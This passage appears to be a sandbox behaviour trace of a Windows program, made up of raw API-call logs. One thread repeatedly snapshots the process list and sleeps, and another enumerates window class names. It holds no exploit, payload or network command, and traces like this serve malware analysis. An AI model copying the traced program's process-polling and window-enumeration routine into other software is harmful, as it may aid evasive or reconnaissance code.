(dwFlags=0x2, th32ProcessID=0x0) returned 0x23a8 [0314.582] Process32First (in: hSnapshot=0x23a8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0314.672] Sleep (dwMilliseconds=0x64) [0314.673] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x23a8 [0314.694] Process32First (in: hSnapshot=0x23a8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0314.836] Sleep (dwMilliseconds=0x64) [0314.838] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x23a8 [0314.854] Process32First (in: hSnapshot=0x23a8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0314.969] Sleep (dwMilliseconds=0x64) [0314.970] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x23a8 [0315.028] Process32First (in: hSnapshot=0x23a8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0315.170] Sleep (dwMilliseconds=0x64) [0315.173] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x23a8 [0315.252] Process32First (in: hSnapshot=0x23a8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0315.455] Sleep (dwMilliseconds=0x64) [0315.456] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x23a8 [0315.469] Process32First (in: hSnapshot=0x23a8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0315.538] Sleep (dwMilliseconds=0x64) [0315.541] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x23a8 [0315.555] Process32First (in: hSnapshot=0x23a8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0315.641] Sleep (dwMilliseconds=0x64) [0315.643] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x23a8 [0315.660] Process32First (in: hSnapshot=0x23a8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0315.740] Sleep (dwMilliseconds=0x64) [0315.743] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x23a8 [0315.760] Process32First (in: hSnapshot=0x23a8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0315.887] Sleep (dwMilliseconds=0x64) [0315.889] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x23a8 [0315.901] Process32First (in: hSnapshot=0x23a8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0315.990] Sleep (dwMilliseconds=0x64) [0315.992] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x23a8 [0316.014] Process32First (in: hSnapshot=0x23a8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0316.101] Sleep (dwMilliseconds=0x64) [0316.103] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x23a8 [0316.117] Process32First (in: hSnapshot=0x23a8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0316.263] Sleep (dwMilliseconds=0x64) [0316.266] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x23a8 [0316.287] Process32First (in: hSnapshot=0x23a8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0316.429] Sleep (dwMilliseconds=0x64) [0316.461] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x23a8 [0316.476] Process32First (in: hSnapshot=0x23a8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0316.655] Sleep (dwMilliseconds=0x64) [0316.657] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x23a8 [0316.675] Process32First (in: hSnapshot=0x23a8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0316.845] Sleep (dwMilliseconds=0x64) [0316.848] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x23a8 [0316.868] Process32First (in: hSnapshot=0x23a8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0316.971] Sleep (dwMilliseconds=0x64) [0316.986] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x23a8 [0317.006] Process32First (in: hSnapshot=0x23a8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0317.117] Sleep (dwMilliseconds=0x64) [0317.119] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x23a8 [0317.135] Process32First (in: hSnapshot=0x23a8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0317.229] Sleep (dwMilliseconds=0x64) [0317.231] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x23a8 [0317.249] Process32First (in: hSnapshot=0x23a8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0317.331] Sleep (dwMilliseconds=0x64) [0317.333] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x23a8 [0317.345] Process32First (in: hSnapshot=0x23a8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0317.420] Sleep (dwMilliseconds=0x64) [0317.422] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x23a8 [0317.434] Process32First (in: hSnapshot=0x23a8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0317.531] Sleep (dwMilliseconds=0x64) [0317.535] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x23a8 [0317.555] Process32First (in: hSnapshot=0x23a8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0317.650] Sleep (dwMilliseconds=0x64) [0317.653] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x23a8 [0317.669] Process32First (in: hSnapshot=0x23a8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0317.767] Sleep (dwMilliseconds=0x64) [0317.770] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x23a8 [0317.787] Process32First (in: hSnapshot=0x23a8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0317.911] Sleep (dwMilliseconds=0x64) [0317.913] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x23a8 [0317.931] Process32First (in: hSnapshot=0x23a8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0318.000] Sleep (dwMilliseconds=0x64) [0318.003] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x23a8 [0318.017] Process32First (in: hSnapshot=0x23a8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0318.143] Sleep (dwMilliseconds=0x64) [0318.149] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2004 [0318.167] Process32First (in: hSnapshot=0x2004, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0318.310] Sleep (dwMilliseconds=0x64) [0318.328] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x23a8 [0318.348] Process32First (in: hSnapshot=0x23a8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0318.451] Sleep (dwMilliseconds=0x64) [0318.453] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x23a8 [0318.473] Process32First (in: hSnapshot=0x23a8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0318.563] Sleep (dwMilliseconds=0x64) [0318.569] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x23a8 [0318.596] Process32First (in: hSnapshot=0x23a8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0318.709] Sleep (dwMilliseconds=0x64) [0318.713] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x23a8 [0318.734] Process32First (in: hSnapshot=0x23a8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0319.050] Sleep (dwMilliseconds=0x64) [0319.052] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x23a8 [0319.097] Process32First (in: hSnapshot=0x23a8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0319.210] Sleep (dwMilliseconds=0x64) [0319.212] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x23a8 [0319.239] Process32First (in: hSnapshot=0x23a8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0319.357] Sleep (dwMilliseconds=0x64) [0319.360] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x23a8 [0319.378] Process32First (in: hSnapshot=0x23a8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0319.456] Sleep (dwMilliseconds=0x64) [0319.457] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x23a8 [0319.471] Process32First (in: hSnapshot=0x23a8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0319.556] Sleep (dwMilliseconds=0x64) [0319.579] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x23a8 [0319.605] Process32First (in: hSnapshot=0x23a8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0319.682] Sleep (dwMilliseconds=0x64) [0319.685] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x23a8 [0319.715] Process32First (in: hSnapshot=0x23a8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0319.924] Sleep (dwMilliseconds=0x64) [0319.926] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x23a8 [0319.981] Process32First (in: hSnapshot=0x23a8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0320.053] Sleep (dwMilliseconds=0x64) [0320.056] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x23a8 [0320.077] Process32First (in: hSnapshot=0x23a8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0320.163] Sleep (dwMilliseconds=0x64) [0320.180] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x23a8 [0320.197] Process32First (in: hSnapshot=0x23a8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0320.289] Sleep (dwMilliseconds=0x64) [0320.290] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x23a8 [0320.302] Process32First (in: hSnapshot=0x23a8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0320.491] Sleep (dwMilliseconds=0x64) [0320.494] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x23a8 [0320.513] Process32First (in: hSnapshot=0x23a8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0320.585] Sleep (dwMilliseconds=0x64) [0320.586] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x23a8 [0320.601] Process32First (in: hSnapshot=0x23a8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0320.689] Sleep (dwMilliseconds=0x64) [0320.691] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x23a8 [0320.710] Process32First (in: hSnapshot=0x23a8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0320.930] Sleep (dwMilliseconds=0x64) [0320.933] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x23a8 [0320.964] Process32First (in: hSnapshot=0x23a8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0321.037] Sleep (dwMilliseconds=0x64) [0321.039] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x23a8 [0321.051] Process32First (in: hSnapshot=0x23a8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0321.175] Sleep (dwMilliseconds=0x64) [0321.177] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x23a8 [0321.191] Process32First (in: hSnapshot=0x23a8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0321.274] Sleep (dwMilliseconds=0x64) [0321.278] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x23a8 [0321.296] Process32First (in: hSnapshot=0x23a8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0321.392] Sleep (dwMilliseconds=0x64) [0321.395] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x23a8 [0321.412] Process32First (in: hSnapshot=0x23a8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0321.506] Sleep (dwMilliseconds=0x64) [0321.508] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x23a8 [0321.525] Process32First (in: hSnapshot=0x23a8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0321.632] Sleep (dwMilliseconds=0x64) [0321.634] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x23a8 [0321.652] Process32First (in: hSnapshot=0x23a8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0321.747] Sleep (dwMilliseconds=0x64) [0321.750] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x23a8 [0321.764] Process32First (in: hSnapshot=0x23a8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 Thread: id = 55 os_tid = 0x1010 [0145.723] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) returned 1 [0145.725] GetClassNameA (in: hWnd=0x100e0, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="Worker Window") returned 13 [0145.725] GetClassNameA (in: hWnd=0x10128, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="ForegroundStaging") returned 17 [0145.725] GetClassNameA (in: hWnd=0x100f8, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="ForegroundStaging") returned 17 [0145.726] GetClassNameA (in: hWnd=0x10106, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="EdgeUiInputWndClass") returned 19 [0145.726] GetClassNameA (in: hWnd=0x1010a, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="EdgeUiInputWndClass") returned 19 [0145.726] GetClassNameA (in: hWnd=0x1010c, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="EdgeUiInputWndClass") returned 19 [0145.726] GetClassNameA (in: hWnd=0x10108, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="EdgeUiInputWndClass") returned 19 [0145.726] GetClassNameA (in: hWnd=0x10104, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="EdgeUiInputWndClass") returned 19 [0145.726] GetClassNameA (in: hWnd=0x10102, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="EdgeUiInputTopWndClass") returned 22 [0145.726] GetClassNameA (in: hWnd=0x10100, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="EdgeUiInputWndClass") returned 19 [0145.726] GetClassNameA (in: hWnd=0x100fe, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="EdgeUiInputWndClass") returned 19 [0145.726] GetClassNameA (in: hWnd=0x1016a, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="Windows.UI.Core.CoreWindow") returned 26 [0145.726] GetClassNameA (in: hWnd=0x1015e, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="Windows.UI.Core.CoreWindow") returned 26 [0145.726] GetClassNameA (in: hWnd=0x1014e, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="Windows.UI.Core.CoreWindow") returned 26 [0145.726] GetClassNameA (in: hWnd=0x100fc, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0145.726] GetClassNameA (in: hWnd=0x100ec, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="ApplicationManager_ImmersiveShellWindow") returned 39 [0145.726] GetClassNameA (in: hWnd=0x10186, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="URL Moniker Notification Window") returned 31 [0145.726] GetClassNameA (in: hWnd=0x1017e, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="VSyncHelper-0000000005E2DC10-1624832") returned 36 [0145.727] GetClassNameA (in: hWnd=0x10176, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="RawInputClass") returned 13 [0145.727] GetClassNameA (in: hWnd=0x10170, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="Internet Explorer_Hidden") returned 24 [0145.727] GetClassNameA (in: hWnd=0x100ca, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0145.727] GetClassNameA (in: hWnd=0x100a4, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0145.727] GetClassNameA (in: hWnd=0x100a8, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0145.727] GetClassNameA (in: hWnd=0x100b4, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0145.727] GetClassNameA (in: hWnd=0x100be, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0145.727] GetClassNameA (in: hWnd=0x100c2, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0145.727] GetClassNameA (in: hWnd=0x1008c, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 